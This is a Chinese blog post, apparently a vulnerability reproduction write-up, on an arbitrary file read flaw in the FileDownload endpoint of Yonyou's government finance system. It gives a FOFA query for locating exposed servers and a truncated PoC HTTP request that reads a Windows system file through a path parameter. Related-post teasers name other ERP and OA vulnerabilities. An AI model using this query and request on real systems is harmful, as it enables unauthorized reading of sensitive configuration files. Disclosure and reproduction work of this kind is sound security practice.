用友政务财务系统 FileDownload 任意文件读取漏洞复现

已于 2024-04-24 13:52:38 修改
阅读量721 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-04-24 13:52:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/138156942
版权
本文介绍了用友政务财务系统中的FileDownload接口存在的任意文件读取漏洞,详细阐述了漏洞概述、复现环境及修复建议。攻击者可利用此漏洞读取敏感文件,影响系统安全。
摘要由CSDN通过智能技术生成

0x01 产品简介

用友政务财务系统具有多项核心功能,旨在满足各类组织的财务管理需求。首先,它提供了财务核算功能,能够全面管理企业的总账、固定资产、现金、应付应收等模块,实时掌握企业的财务状况,并通过科目管理、凭证处理、报表分析等功能为决策提供有力支持。

0x02 漏洞概述

用友政务财务系统 FileDownload 接口存在任意文件读取漏洞,未经身份攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:

app="用友-政务财务系统" || body="/df/portal/getYearRgcode.do"

0x04 漏洞复现 

PoC

GET /bg/attach/FileDownload?execlPath=C://Windows//win.ini  HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
订阅专栏
漏洞复现用友政务财务系统 FileDownload 任意文件读取漏洞
qq_67810151的博客
04-21 419
用友政务财务系统存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取服务器任意文件,造成敏感信息泄露。
用友时空KSOA 多处 SQL注入漏洞复现
最新发布
0xSec
07-31 560
用友时空KSOA系统 PrintZP.jsp、PrintZPFB.jsp、PrintZPYG.jsp、PrintZPZP.jsp、fillKP.jsp等多处接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
用友NC任意文件读取
voctor2436的博客
05-24 1287
用友NC产品的全新系列、是面向集团企业的世界级高端管理软件,用友NC6的产品定位于大型企业管理与电子商务平台。用友NCFindWeb文件存在任意文件读取漏洞,攻击者通过漏洞可以获取网站源码,导致服务器失陷。用友NC采用J2EE架构和先进开放的集团级开发平台UAP,形成了集团管控8大领域15大行业68个细分行业的解决方案。一般性的建议:关注官方新版本的发布及补丁更新,建议使用对应WAF/IPS进行防护。
用友GRPA++Cloud任意文件读取
一个努力学习网安的小牛马
05-11 409
用友 GRP-A++Cloud 政府财务云产品是以政府会计准则和预算管理一体化规范为基准,服务于政府行政事业单位,落实国家信创和行政事业单位内部控制规范要求,支持省级集中部署以及内部、外部业务协同,通过构建云原生服务,支撑业务的持续演化和变革,为政府业财一体化、财务规范化、自动化、智能化服务,打造安全、可靠、可控的信息化运行环境,提升各单位数字化治理能力。访问/ma/emp/maEmp/download?在download页面参数为fileName处存在任意文件读取漏洞
用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
qq_17754023的博客
10-22 1043
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件。app="畅捷通-TPlus"
用友U8 Cloud FileServlet 任意文件读取漏洞复现
0xSec
03-31 442
用友U8 Cloud FileServlet接口处存在任意文件读取漏洞,未经身份验证的远程攻击者通过漏洞可以获取系统内部配置文件,使系统处于极不安全的状态。
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
金和OA C6 FileDownLoad.aspx 任意文件读取漏洞复现
0xSec
05-09 726
金和OA C6 FileDownLoad.aspx接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
用友GRP A++Cloud 政府财务任意文件读取漏洞复现(XVE-2024-10490)
0xSec
05-07 751
用友GRP A++Cloud 政府财务云 /ma/emp/maEmp/download接口存在任意文件读取漏洞,未经身份攻击者可通过该漏洞读取系统重要文件(如数据库配置文件系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
用友GRP-A++系统FileDownload接口存在拼接参数读取任意文件漏洞
weixin_43567873的博客
03-04 135
用友GRP-A++系统FileDownload接口存在拼接参数读取任意文件漏洞
(新接口)用友政务系统某接口存在未授权访问漏洞-未公开漏洞
weixin_43167326的博客
02-22 746
用友政务A++V832是一款专为政府机构设计的综合信息化管理软件,具有全面的业务覆盖和强大的功能特性。该版本在原有功能基础上进一步优化升级,提升了系统性能和用户体验,支持多终端访问、移动办公等特性。同时,A++V832还加强了数据安全保护机制,提供智能化的决策支持和精细化的管理功能,帮助政府机构提高工作效率、降低成本,实现数字化转型和智慧政务建设。
用友政务财务系统FileDownload接口存在任意文件读取漏洞
wan___she__pi的博客
04-27 595
用友政务财务系统是由用友软件开发的一款针对政府机构和公共事业单位设计的财务管理软件。该系统旨在提供全面的财务管理解决方案,以满足政府机构和公共事业单位在财务管理方面的需求。
漏洞复现】​金蝶云星空管理中心反序列化命令执行漏洞(RCE)
做自己喜欢的事,并将其发挥到极致!
07-23 3832
金蝶云星空管理中心是金蝶软件(中国)有限公司基于云计算、大数据、社交、人工智能、物联网等前沿技术研发的新一代战略性企业管理软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。该软件存在远程命令执行漏洞,外部攻击者可通过使用恶意攻击手段对目标系统进行权限获取,进而接管服务器控制权。
用友时空KSOA SQL注入漏洞复现
0xSec
08-13 2601
用友时空KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
用友U8-Cloud接口FileServlet存在任意文件读取漏洞(含批量验证poc)
weixin_43567873的博客
03-29 146
用友U8-Cloud接口FileServlet存在任意文件读取漏洞
漏洞复现--用友NC Cloud XXE
qq_53003652的博客
12-27 1317
NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品soapFormat和IUpdateService存在XXE漏洞,可导致文件读取和RCE。
【1day】复现用友畅捷通CRM create_site.phpSQL注入漏洞
记录并分享学习安全的知识点..
08-08 356
用友CRM是专为小企业量身打造的智慧型客户关系管理应用,它包括客户、商机、报价、团队管理、客户营销、客户服务、主题查询及统计分析,帮助企业管好客户、管好业务员、做好销售业务;系统还提供通知、审批、短信、文档、任务等协作功能,提高销售团队的协作效率,其中 create_site.php接口存在时间盲注漏洞
用友NC PrintTemplateFileServlet 接口任意文件读取漏洞
weixin_43567873的博客
03-04 81
用友NC PrintTemplateFileServlet 接口存在任意文件读取漏洞
泛微 e-cology9 filedownload.jsp 任意文件读取
11-24
泛微 e-cology9 是一款企业级办公自动化软件,然而它的 filedownload.jsp 存在任意文件读取漏洞。攻击者可以通过构造恶意的请求,访问该漏洞读取系统中的任意文件,包括敏感信息如用户凭证、配置文件和数据库等...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值